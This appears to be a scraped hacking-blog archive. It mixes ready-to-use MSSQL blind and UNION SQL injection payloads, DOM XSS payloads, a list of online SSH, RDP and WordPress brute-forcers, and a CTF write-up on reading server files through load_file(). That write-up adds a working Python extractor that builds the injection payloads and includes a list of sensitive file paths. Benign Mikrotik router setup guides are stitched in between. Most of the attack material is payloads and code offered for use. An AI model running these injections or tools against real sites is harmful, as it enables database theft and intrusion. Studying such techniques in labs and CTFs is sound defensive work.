http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc))=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),2,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field data = JOE

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3rd ROW
(every value already recovered is excluded, otherwise the descending sort hands back JOE again)
http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN','JOE') order by USER desc))=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN','JOE') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN','JOE') order by USER desc),2,1)))=105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN','JOE') order by USER desc),3,1)))=109) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Field data = JIM
DOM Based Cross Site Scripting
31 Dec 2011
in SQL Injection Tags: xss
DOM XSS Example 1:
http://evilsql.com/main/page5.php?<script>alert('XSS')</script>
DOM XSS Example 2:
http://evilsql.com/main/page5.php?name=<script>alert('XSS')</script>
DOM XSS Example 3 (payload in the fragment: it never leaves the browser, so server-side filters and logs do not see it):
http://evilsql.com/main/page5.php?#<script>alert('XSS')</script>
DOM XSS Example 4:
http://nobody@evilsql.com/main/page5.php?<script>alert('XSS')</script>
DOM Echo:
http://www.evilsql.com/main/page5.php
Microsoft SQL Union Exploit
31 Dec 2011
in SQL Injection Tags: sql injection
UNION SQL INJECTION - DETECTION
Integer injection, adding one column per request until the column counts match:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--
Error returned: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
Error returned: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--
Error returned: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--
No error: the original query has four columns.
Note: the position used to carry the string (2 below) must be one the page displays and whose type accepts text; in a numeric position the same conversion error as in the error-based technique appears instead of the value. Use NULL in positions whose type is unknown.

UNION SQL INJECTION - EXTRACT DATABASE USER
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--
Output: [DB USER]

UNION SQL INJECTION - EXTRACT DATABASE NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME(),3,4--
Output: [DB NAME]

UNION SQL INJECTION - EXTRACT DATABASE VERSION
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--
Output: [DB VERSION]

UNION SQL INJECTION - EXTRACT SERVER NAME
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--
Output: [SERVER NAME]

UNION SQL INJECTION - EXTRACT DATABASE TABLES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--
Output: [TABLE NAME 1] (and, if the page prints every row, the remaining table names)

UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--
Output: [COLUMN NAME 1]

UNION SQL INJECTION - EXTRACT 1st FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--
Output: [FIELD 1 VALUE]

UNION SQL INJECTION - EXTRACT 2nd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--
Output: [FIELD 2 VALUE]

UNION SQL INJECTION - EXTRACT 3rd FIELD
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--
Output: [FIELD 3 VALUE]
Building a Mikrotik firewall with simple-mode logic
23 Dec 2011
Article author: Nathan Gusti Ryan
Here I share, step by step, how to build a Mikrotik firewall configuration in a simple and logical way, so that it is easier to understand because it is more "human"...
We start from a Mikrotik Winbox session in which the IP addresses, NAT, IP routes and DNS are already configured correctly and the Mikrotik is working.
1. Block one client IP address from reaching the internet.
Create a firewall rule:
- Chain = forward
- Src. Address = 192.168.10.10
- Out. Interface = WAN
- Action = drop
Client PC 192.168.10.10 can then no longer reach the internet.
2. Block one client MAC address from reaching the internet.
Create a firewall rule:
- Chain = forward
- Out. Interface = WAN
- Advanced: Src. MAC Address = 00:1F:3C:66:E6:A6
- Action = drop
The client PC with MAC address 00:1F:3C:66:E6:A6 can then no longer reach the internet.
3. Block a website so that our client PCs cannot access it (example: playboy.com).
Create a firewall rule:
- Chain = forward
- Out. Interface = WAN
- Dst. Address = 202.134.0.135 (found by pinging playboy.com)
- Action = drop
Client PCs can then no longer reach playboy.com.
4. Block a group of clients through an address list so that they cannot reach the internet.
Create a firewall rule:
- First create a list in Firewall > Address Lists (for example LAN-BLOCKED) and add the client addresses to it.
- Chain = forward
- Out. Interface = WAN
- Advanced: Src. Address List = LAN-BLOCKED
- Action = drop
Client PCs registered in LAN-BLOCKED can then no longer reach the internet.
5. Block a website that has several public IPs, or several forbidden websites at once, for the client PCs on our network (example: facebook.com).
Create a firewall rule:
- Create a list in Firewall > Address Lists, for example FACEBOOK, holding the site's addresses (found by pinging facebook.com).
- Create a second list in Firewall > Address Lists (for example LAN-FILTERED) holding the clients to restrict.
- Chain = forward
- Out. Interface = WAN
- Advanced: Src. Address List = LAN-FILTERED
- Advanced: Dst. Address List = FACEBOOK
- Action = drop
Client PCs in LAN-FILTERED can then no longer reach any address we registered in FACEBOOK (as listed in the Address List menu).
6. Block (blacklist) public IP addresses identified as attacking our Mikrotik.
Create a firewall rule:
- Create a list in Firewall > Address Lists, for example BLACK-HACKER (the addresses can be found in the Log menu).
- Chain = forward
- In. Interface = WAN
- Advanced: Src. Address List = BLACK-HACKER
- Action = drop
Traffic arriving on WAN from any address in BLACK-HACKER is then dropped before it is forwarded to the clients. Note that chain=forward only protects the clients behind the router; to protect the router itself, add the same rule on chain=input.
7. OK, we have now built a number of filtering firewall rules.
Easy, isn't it???
The next article will carry on with firewalling tips & tricks like these.
Have fun trying...
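The same six cases typed at the RouterOS terminal instead of clicked through Winbox, added here as an example (this is not part of the original article). The interface name WAN, the client IP, the MAC and the site IP are the article's own; the address-list members marked "assumed" are placeholders to replace with your own addresses.

```routeros
# 1. one client IP
/ip firewall filter add chain=forward src-address=192.168.10.10 out-interface=WAN action=drop comment="1: block client 192.168.10.10"
# 2. one client MAC (Winbox: Advanced > Src. MAC Address)
/ip firewall filter add chain=forward src-mac-address=00:1F:3C:66:E6:A6 out-interface=WAN action=drop comment="2: block client by MAC"
# 3. one destination IP
/ip firewall filter add chain=forward dst-address=202.134.0.135 out-interface=WAN action=drop comment="3: block playboy.com"
# 4. a group of clients
/ip firewall address-list add list=LAN-BLOCKED address=192.168.10.20 comment="assumed member"
/ip firewall address-list add list=LAN-BLOCKED address=192.168.10.21 comment="assumed member"
/ip firewall filter add chain=forward src-address-list=LAN-BLOCKED out-interface=WAN action=drop comment="4: block LAN-BLOCKED"
# 5. a group of clients to a group of destinations
/ip firewall address-list add list=FACEBOOK address=192.0.2.10 comment="assumed; use the IPs you get from ping"
/ip firewall address-list add list=LAN-FILTERED address=192.168.10.0/24 comment="assumed member"
/ip firewall filter add chain=forward src-address-list=LAN-FILTERED dst-address-list=FACEBOOK out-interface=WAN action=drop comment="5: LAN-FILTERED -> FACEBOOK"
# 6. blacklisted public sources: forward protects the clients, input protects the router itself
/ip firewall address-list add list=BLACK-HACKER address=198.51.100.7 comment="assumed; take real IPs from the log"
/ip firewall filter add chain=forward in-interface=WAN src-address-list=BLACK-HACKER action=drop comment="6: BLACK-HACKER"
/ip firewall filter add chain=input in-interface=WAN src-address-list=BLACK-HACKER action=drop comment="6: BLACK-HACKER (router itself)"
```

Rules are evaluated top to bottom and the first match wins, so these drop rules must sit above any general accept rule in the same chain; check with `/ip firewall filter print` and use `move` if they landed below one.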
Step by Step Installasi Router Mikrotik dgn ADSL Speedy
23 Dec 2011 Leave a Comment
Penulis Artikel : Nathan Gusti Ryan
MikroTik, true to its vision of ROUTING THE WORLD, is by now widely recognised as a very reliable router with a very complete feature set that is also very easy to configure. Yet quite a few MikroTik users give it up and go back to a "plain" network, not because MikroTik is unreliable or "dumb", but because their own staff have not yet understood and mastered its functions and the technical side of configuring it. So keep learning to become more expert with MikroTik, including those of you who want a professional career in IT networking, at an ISP or in telco. Prepare your skills as a truly capable MikroTik administrator: not merely "able to", but genuinely expert...
That is why, drawing on my experience using MikroTik from 2005 up to 2010, I wrote the training material for MikroTik Bandwidth Management and MikroTik VPN Server - Client, and within 5 months (November 2009 - February 2011) ran more than 30 training classes with more than 500 participants (regular / public classes as well as private / in-house training). The training is not profit oriented; it is meant as sharing knowledge and experience with fellow IT people, students and communities.
Installing a MikroTik PC router or configuring a MikroTik RouterBoard is not hard (if you really understand the basic concepts and the technique), but it is not easy either (for MikroTik newbies and for anyone who configures things haphazardly without really understanding how MikroTik works).
There are 2 ways to use a Speedy connection with a MikroTik router:
1. The ADSL modem is configured as the PPPoE client and the Speedy username & password are entered on the modem, so once connected to Speedy the public IP sits on the ADSL modem. In this option MikroTik only does BANDWIDTH MANAGEMENT plus various other features, but only for LOCAL services.
2. The ADSL modem is set to BRIDGE mode and the Speedy username & password are entered on the MikroTik (PPPoE Client), so once connected the public IP sits on the MikroTik. In this option MikroTik does not only do BANDWIDTH MANAGEMENT; its other features can also be used for PUBLIC services such as VPN server / client, FTP server, web server, etc.
Before we start configuring, here is the network topology we are going to build. The ADSL modem is set as a bridge (Bridge mode, not PPPoE). The IP addresses are free to choose according to your own network. Once again, if we properly understand the MikroTik concepts, building a router for any kind of connection or with any IP addresses will feel easy and WILL SUCCEED...
0: What you need to build a MikroTik PC router: an old PC, at least a Pentium II/400 MHz, a hard disk of at least 1 GB, 64 MB / 128 MB of RAM, 2 PCI LAN cards (Intel / Realtek / DLink / 3Com / TPLink / etc.), a CD-ROM drive, the MikroTik installer CD, enough UTP cable and an ADSL modem that supports BRIDGE MODE.
1: IP address of the ADSL modem: 192.168.1.1
2: IP address of the MikroTik interface facing the ADSL modem: 192.168.1.10 (must be in the same segment as the modem's IP address). Strictly speaking we could leave this interface without an IP address, because PPPoE discovery finds the bridged modem by itself at layer 2, but giving it an address makes it easy to check the connection / ping the ADSL modem.
3: IP address of the MikroTik interface facing the switch / hub / clients: 192.168.88.251 (I just happen to use this IP; what matters is that it is in the same segment as our other client PCs). Look at and study the picture below:
After the preparation stage, in which we understood the concept and the topology of the MikroTik network we are going to build, the recipe is as follows:
Step one: set the ADSL modem to Bridge mode:
Step two: prepare a PC with 2 LAN cards and install MikroTik on it.
Step three: after the installation finishes, reboot the PC router and connect to MikroTik with Winbox. Then rename the two interfaces to LAN and SPEEDY. This makes them easy to identify so that we do not configure the wrong interface.
Step four: set the IP address for LAN: 192.168.88.251/24 and for the SPEEDY interface: 192.168.1.10/24.
Step five: next set the DNS servers to Speedy's DNS IPs: 202.134.1.10 and 202.134.0.155. Go to the "IP" menu and choose "DNS". If the router is to answer DNS queries from the clients (step twelve), "Allow Remote Requests" must be ticked here as well.
Step six: the next step is to create a PPPoE Client interface. Click the Interface menu, click the plus symbol and choose "PPPoE Client". This is also where we enter the Speedy username and password we have.
On the "General" tab it is enough to select the interface that is on the same link as the ADSL modem. The default name and type are fine.
Don't forget to select the interface facing the ADSL modem, the one we named "SPEEDY". Then click the "Dial Out" tab and enter the username + password of our Speedy account.
Besides Winbox, the Speedy username and password can also be entered through WebBox.
Step seven: once the PPPoE Client has been configured, MikroTik immediately dials through the ADSL modem. If the username and password are correct the connection status will show up, and under IP -> Address a new address appears: the public IP (125.164.75.150 in this example) that Telkom Speedy assigns to the subscriber on the basis of the username & password.
Step eight: next configure NAT (Network Address Translation) so that the clients can connect to the Internet. Go to IP -> Firewall -> NAT (as in the picture below).
Step nine: create 1 NAT rule: under "General" -> Chain = srcnat, -> Out Interface = pppoe-out1. Then under "Action" choose -> masquerade.
Besides the console or Winbox, this NAT setting can also be made from WebBox (which in my opinion is easier for MikroTik newbies than Winbox). Choose Public Interface = pppoe-out1, tick NAT and click "Apply".
Step ten: next add 1 IP route. Look next to the public IP address below: Network = 125.164.72.1. This "network" address is the Telkom Speedy gateway that serves our connection. Add a new route with Destination: 0.0.0.0/0 and Gateway = 125.164.72.1. (If "Add Default Route" is ticked in the PPPoE Client settings this route is created automatically and follows the gateway when it changes after a reconnect; a hand-typed route does not.)
Step eleven: at this point the MikroTik router configuration is complete. All that remains is a ping test from the MikroTik. Ping Speedy's DNS IP, 202.134.1.10, then ping yahoo.com or other websites. If there is a reply, our MikroTik has been configured successfully.
Step twelve: this step is done on the client PCs. The IP of the MikroTik LAN interface is the gateway for the client PCs. For DNS on the clients we can enter Speedy's DNS IPs directly or the MikroTik's IP (because we set MikroTik up as a DNS relay in step five). Note that with "Allow Remote Requests" enabled the router also answers DNS queries arriving on the PPPoE interface, i.e. from the whole Internet; add an Input chain firewall rule that drops UDP and TCP port 53 on pppoe-out1 so that it only serves the LAN.
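Steps three to eleven as one console session, added here as an example and not part of the original article. The interface names (ether1/ether2 renamed to SPEEDY/LAN, pppoe-out1), the 192.168.x addresses and the Speedy account name are placeholders taken from the article's topology; the DNS addresses are the ones the article gives; RouterOS 6 syntax is assumed.

```routeros
# Step three: name the interfaces after their role so they cannot be mixed up.
/interface ethernet set ether1 name=SPEEDY
/interface ethernet set ether2 name=LAN

# Step four: addresses (the SPEEDY address only exists so the bridged modem can be pinged).
/ip address add address=192.168.1.10/24 interface=SPEEDY comment="towards ADSL modem 192.168.1.1"
/ip address add address=192.168.88.251/24 interface=LAN comment="client gateway"

# Step five: Speedy DNS; allow-remote-requests lets the router act as DNS relay for the LAN.
/ip dns set servers=202.134.1.10,202.134.0.155 allow-remote-requests=yes

# Step six/seven: PPPoE client on the modem-facing interface. add-default-route=yes replaces
# the hand-typed 0.0.0.0/0 route of step ten and follows the gateway across reconnects.
/interface pppoe-client add name=pppoe-out1 interface=SPEEDY user="username@telkom.net" password="CHANGE-ME" add-default-route=yes use-peer-dns=no disabled=no

# Step eight/nine: masquerade everything leaving through the PPPoE tunnel.
/ip firewall nat add chain=srcnat out-interface=pppoe-out1 action=masquerade comment="internet sharing"

# The DNS relay would otherwise answer the whole Internet on the public IP (open resolver).
/ip firewall filter add chain=input in-interface=pppoe-out1 protocol=udp dst-port=53 action=drop comment="no DNS from WAN"
/ip firewall filter add chain=input in-interface=pppoe-out1 protocol=tcp dst-port=53 action=drop comment="no DNS from WAN"

# Step eleven: checks. The route print should show 0.0.0.0/0 via pppoe-out1.
/ping 202.134.1.10 count=3
/ip route print
/interface pppoe-client monitor pppoe-out1 once
```

`use-peer-dns=no` keeps the DNS servers at the values set in step five instead of letting the ISP overwrite them at each dial-in; set it to yes if you prefer whatever Speedy hands out.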
~~~~~~~~~~~~~~~~~~
Okay, at this point our MikroTik works as a router and internet sharing for all the other clients is up. The next stage is bandwidth management: allocating the right bandwidth to every client so that a client downloading with accelerator software can be kept under control and does not eat all the bandwidth on his own, leaving the other clients' internet access slow.
http://thinkxfree.wordpress.com/2010/04/16/step-by-step-installasi-router-mikrotik-dgn-adsl-speedy/
Online Scan
12 Nov 2011 3 Comments
in hacking
Online Port Scanner
Online VNC Scanner
Online SSH Scanner
http://scan.subhashdasyam.com/ssh-scanner.php
Online Admin Page Bruter
http://scan.subhashdasyam.com/admin-page-finder.php
Online WordPress Admin/Password Bruter
http://scan.subhashdasyam.com/wordpress-bruter.php
Online LFI Scanner
http://scan.subhashdasyam.com/lfi-scanner.php
Online RDP Scanner
http://scan.subhashdasyam.com/remote-desktop-scanner.php
Fastest Online SQL Injection Values Dumper
http://scan.subhashdasyam.com/dumper.php
Fastest Online SQL Injection Values Dumper(Supports Login)
http://scan.subhashdasyam.com/dumper-with-login.php
Blind SQL injection with load_file()
15 Sep 2011 Leave a Comment
Currently I am working a lot on RIPS but here is a small blogpost about a technique I thought about lately and wanted to share.
While participating at the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege:
/level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0x59
(The hex literals avoid quotes: 0x66696C65 is "file", 0x25726F6F7425 is "%root%" and 0x59 is "Y"; /**/ stands in for spaces.)
Luckily the FILE privilege was granted which was not intended by the organizer. Since I had not solved level 1 at that time I thought it would be easier to read the PHP files to solve level 1. First I checked if reading files with load_file() worked at all and tried to read /etc/passwd:
$files = array( // array name assumed; the line opening the list is missing from the page
"/etc/passwd",
"/etc/init.d/apache/httpd.conf",
"/etc/init.d/apache2/httpd.conf",
"/etc/httpd/httpd.conf",
"/etc/httpd/conf/httpd.conf",
"/etc/apache/apache.conf",
"/etc/apache/httpd.conf",
"/etc/apache2/apache2.conf",
"/etc/apache2/httpd.conf",
"/usr/local/apache2/conf/httpd.conf",
"/usr/local/apache/conf/httpd.conf",
"/opt/apache/conf/httpd.conf",
"/home/apache/httpd.conf",
"/home/apache/conf/httpd.conf",
"/etc/apache2/sites-available/default",
"/etc/apache2/vhosts.d/default_vhost.include");
Webpage with id=1 was displayed for the file /etc/httpd/httpd.conf thus revealing that this file existed and could be read.
Now it was time for the tricky part: I had only a true/false blind SQL injection which means that I could only bruteforce the configuration file char by char. Since the length of the file was more than 10000 chars this would have taken way too long.
I decided to give little shots at the configuration file trying to hit the DocumentRoot setting or a comment nearby that identifies my current position. Each shot bruteforced 10 alphanumerical characters:
/level2/?id=1/**/and/**/mid(lower(load_file(0x2F6574632F68747470642F68747470642E636F6E66)),$k,1)=0x$char
I compared the few bruteforced characters to a known apache configuration file trying to map the characters to a common configuration comment. This worked for most of the character sequences but unfortunately almost every configuration file is a bit different so that it was not possible to calculate the correct offset of the DocumentRoot setting once another setting had been identified. I bruteforced only alphanumerical strings to save time. For example the bruteforced string “dulesthoselisted” could be mapped to the comment “modules (those listed by `httpd -l’)” and so on.
After the 10th shot I luckily hit the DocumentRoot setting comment at offset 7467 and after this it was possible to calculate the correct offset for the beginning of the DocumentRoot setting and I could retrieve “srvhttpdhtdocs” (DocumentRoot: /srv/httpd/htdocs/).
While that worked fine in the hectic pace of the CTF and was better than a bruteforce on the whole configuration file, I thought about it again yesterday and realised that this technique was plain stupid.
If you know what you are looking for in a file (and mostly you do) you can easily find the correct offset with LOCATE(substr,str[,pos]) which will return the offset of a given substring found in a string. The following query instantly returns the next 10 characters after the DocumentRoot setting:
https://websec.wordpress.com/2010/10/01/blind-sql-injection-with-load_file/
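The LOCATE() idea carried through to a working blind extractor, as an added example that is not code from the original post. It builds the same `id=1 and ...` payloads the post uses (the `/level2/?id=` injection point and the `/**/` spacing are taken from it), anchors every read on `locate(needle, load_file(...))` so no byte offset has to be guessed, and replaces guessing characters with a binary search on `ORD()`, which costs a fixed 8 requests per byte. The server side (`FakeMySQL`) and the `httpd.conf` fragment are constructed stand-ins so the script runs offline; against a real target `oracle` is whatever function sends the payload and returns whether the id=1 page came back.

```python
"""Boolean-based blind SQL injection over load_file(), anchored on LOCATE().
Added example, not part of the original post. FakeMySQL is a constructed
stand-in for the vulnerable page; the payload shape follows /level2/?id=1."""
import re


def hexlit(s: str) -> str:
    """MySQL hex literal (0x...): a string constant that needs no quotes."""
    return "0x" + s.encode().hex()


def exists_payload(path: str, needle: str) -> str:
    """True iff the file is readable and contains `needle`
    (LOCATE returns 0 when absent, load_file() returns NULL when unreadable)."""
    return f"1/**/and/**/locate({hexlit(needle)},load_file({hexlit(path)}))>0"


def ord_payload(path: str, needle: str, skip: int, pos: int, op: str, val: int) -> str:
    """Compare the byte at LOCATE(needle)+skip+pos with `val`.
    LOCATE() and MID() are 1-based, so skip=len(needle), pos=0 is the first
    byte after the needle."""
    f, n = hexlit(path), hexlit(needle)
    return (f"1/**/and/**/ord(mid(load_file({f}),"
            f"locate({n},load_file({f}))+{skip + pos},1)){op}{val}")


def extract_after(oracle, path: str, needle: str, count: int, skip=None) -> str:
    """Read `count` bytes following `needle` using only a true/false oracle.
    Binary search on ORD(): 8 requests per byte for any byte value, instead
    of one request per candidate character."""
    if skip is None:
        skip = len(needle)
    if not oracle(exists_payload(path, needle)):
        raise ValueError(f"{needle!r} not found in {path} (or file unreadable)")
    out = []
    for pos in range(count):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(ord_payload(path, needle, skip, pos, ">", mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # ORD('') is 0: we ran past the end of the file
            break
        out.append(chr(lo))
    return "".join(out)


class FakeMySQL:
    """Constructed stand-in for the vulnerable page. Evaluates only the two
    payload shapes above, with MySQL semantics: LOCATE is 1-based and 0 when
    absent, MID is 1-based and '' at position 0 or past the end, ORD('') is 0.
    Files are ASCII, so ORD() is one byte."""
    _ORD = re.compile(r"ord\(mid\(load_file\((0x[0-9a-f]+)\),locate\((0x[0-9a-f]+),"
                      r"load_file\(0x[0-9a-f]+\)\)\+(\d+),1\)\)([<>=])(\d+)$")
    _EXISTS = re.compile(r"locate\((0x[0-9a-f]+),load_file\((0x[0-9a-f]+)\)\)>0$")

    def __init__(self, files: dict):
        self.files = files      # path -> content readable with the FILE privilege
        self.queries = 0        # request counter, to see what a technique costs

    @staticmethod
    def _unhex(lit: str) -> str:
        return bytes.fromhex(lit[2:]).decode()

    def __call__(self, payload: str) -> bool:
        """True when the page for id=1 would be displayed, False otherwise."""
        self.queries += 1
        m = self._ORD.search(payload)
        if m:
            data = self.files.get(self._unhex(m.group(1)))
            if data is None:
                return False    # load_file() -> NULL -> the whole condition is NULL
            start = data.find(self._unhex(m.group(2))) + 1 + int(m.group(3))
            ch = data[start - 1:start] if start >= 1 else ""
            o, v = (ord(ch) if ch else 0), int(m.group(5))
            return {"<": o < v, ">": o > v, "=": o == v}[m.group(4)]
        m = self._EXISTS.search(payload)
        if m:
            data = self.files.get(self._unhex(m.group(2)))
            return data is not None and self._unhex(m.group(1)) in data
        raise ValueError("unsupported payload: " + payload)


# Constructed httpd.conf fragment, not the CTF's real file.
HTTPD_CONF = (
    "# This is the main Apache server configuration file.\n"
    "ServerRoot \"/etc/httpd\"\n"
    "DocumentRoot \"/srv/httpd/htdocs\"\n"
    "<Directory />\n"
)
CONF_PATH = "/etc/httpd/httpd.conf"


def demo() -> str:
    """Recover the DocumentRoot value without knowing its offset."""
    server = FakeMySQL({CONF_PATH: HTTPD_CONF})
    raw = extract_after(server, CONF_PATH, "DocumentRoot", 20)
    return raw.strip().strip('"')


if __name__ == "__main__":
    print(ord_payload(CONF_PATH, "DocumentRoot", 12, 0, ">", 127))
    print(demo())
```

Twenty bytes after "DocumentRoot" cost 1 + 20 * 8 = 161 requests here; guessing each position from a 36-character alphanumeric set would cost up to 36 per position and could never recover the quotes, slashes or newline. The `exists_payload` check matters because LOCATE() returns 0 when the needle is absent, which would silently turn every read into a read from the start of the file.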
Yu Agh